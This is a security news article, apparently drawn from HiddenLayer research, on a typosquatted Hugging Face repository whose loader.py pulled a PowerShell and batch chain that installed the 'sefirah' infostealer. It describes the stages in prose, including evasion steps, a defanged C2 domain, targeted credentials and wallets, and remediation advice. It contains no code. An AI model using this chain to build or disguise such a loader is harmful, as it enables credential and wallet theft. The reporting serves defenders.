"The repository had typosquatted OpenAI's legitimate Privacy Filter release, copied its model card nearly verbatim, and shipped a loader.py file that fetches and executes infostealer malware on Windows machines," HiddenLayer researchers wrote.
HiddenLayer's discovery and the Hugging Face surge
Researchers at HiddenLayer discovered the malicious repository on May 7 after spotting an entry named Open-OSS/privacy-filter on Hugging Face. The repository briefly climbed to #1 on the platform's trending list and accumulated 244,000 downloads before Hugging Face removed it following reports. The platform, which hosts pre-trained AI models, datasets, and ML tools, allows developers to share model weight files, configuration, and code — a capability the malicious actors exploited by mimicking legitimate content.
loader.py: a benign-looking Python script that wasn't
The repository included a loader.py that superficially contained fake AI-related code to appear harmless. HiddenLayer's examination showed the script disabled SSL verification, decoded a base64 URL pointing to an external resource, and then fetched and executed a JSON payload containing a PowerShell command. That command ran in an invisible window, downloaded a batch file named start.bat, and launched a multi-step chain that culminated in installing the final payload.
start.bat to sefirah: escalation and persistence
The batch file performed privilege escalation and downloaded the final payload identified as sefirah. According to HiddenLayer, the chain added the payload to Microsoft Defender's exclusions and executed it. Sefirah is a Rust-based infostealer that collects a wide range of sensitive material, compresses it, and exfiltrates the data to a command-and-control server at recargapopular[.]com.
Sefirah's target list and anti-analysis features
HiddenLayer cataloged the infostealer's targeted artifacts. The malware harvests browser data from Chromium- and Gecko-based browsers (including cookies, saved passwords, encryption keys, browsing data, and session tokens); Discord tokens, local databases, and master keys; cryptocurrency wallets and wallet browser extensions; SSH, FTP, and VPN credentials and configuration files (including FileZilla); sensitive local files and wallet seeds/keys; system information; and multi-monitor screenshots.
The researchers also noted extensive anti-analysis capabilities: checks for virtual machines, sandboxes, debuggers, and analysis tools intended to evade detection and complicate forensic review.
Reach, artifacts, and related campaigns
HiddenLayer cautioned that the exact number of victims is unclear. The researchers observed 667 accounts that liked the malicious repository, but most of those accounts appear to be auto-generated, and the 244,000 download figure itself may have been artificially inflated. By analyzing accounts and artifacts, HiddenLayer uncovered other repositories using the same malicious loader infrastructure and noted overlaps with an npm typosquatting campaign that distributed the WinOS 4.0 implant.
What this means for security teams, Hugging Face, and affected users
- Security teams and AI/ML researchers: The campaign demonstrates how model-hosting platforms can be abused via typosquatting and cloned model cards; teams should treat downloaded model code as potentially malicious and monitor for loader-like behavior (disabled SSL checks, base64-decoded fetches, and external JSON payload execution).
- Hugging Face and platform operators: The incident underscores a need to rapidly triage trending content and validate publisher identity; Hugging Face removed the repository after reports, but the rapid climb to #1 and the high download count illustrate how quickly malicious content can spread on the platform.
- End users who downloaded files: HiddenLayer advises reimaging affected machines, rotating all stored credentials, replacing cryptocurrency wallets and seed phrases, and invalidating browser sessions and tokens — concrete steps rooted in the malware's stated capabilities.
The intrusion combines straightforward social engineering — typosquatting a legitimate project and copying its model card — with a layered technical chain that moves from Python to PowerShell to a Rust-based infostealer. While the repository was removed and researchers traced linkages to other malicious infrastructure, the facts on exact victim counts and the extent of credential compromise remain unresolved. Who downloaded the malicious package, and how many installations persist despite removal from the hosting platform, are the concrete, unanswered questions left by this campaign.
